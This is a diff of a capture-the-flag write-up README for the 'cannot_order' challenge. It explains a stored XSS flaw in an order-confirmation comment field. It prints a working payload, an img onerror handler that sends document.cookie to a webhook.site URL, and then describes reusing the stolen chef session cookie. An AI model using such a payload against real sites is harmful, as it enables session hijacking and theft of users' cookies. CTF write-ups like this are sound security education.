Jelmm1019/writeups/tudctf2025/cannot_order/README.md

 ### Vulnerability

 The bot visits the `order-confirmation` endpoint.
-While the `Comment` section is vulnerable to stored xss:
+While the `Comment` section is vulnerable to **stored xss**:

 ![confirmation](image-1.png)

 ### Exploit

-Now we can exploit the xss vulnerability in the `Comment` section to exfiltrate the authorized `chef_session` cookie from the chef bot using [webhook.site](webhook.site).
+Now we can exploit the xss vulnerability in the `Comment` section to **exfiltrate** the authorized `chef_session` cookie from the chef bot using [webhook.site](webhook.site).

-This is the payload I used:
+This is the **payload** I used:

 ```html
 hi<img src=1 onerror="window.location='https://webhook.site/55fc4743-809d-4f5f-bf6d-7a7cae9dec6f?x='+document.cookie;">
 ```

 This results in a request being made that leaks the cookies.
-We can use this cookie in our own browser to essentially become logged in as chef, and finally order the Flag from the chefs view!
+We can use this cookie in our own browser to essentially become logged in as chef, and finally order the **Flag** from the chefs view!

 <details>
 <summary>Yes!
 We got the flag:</summary>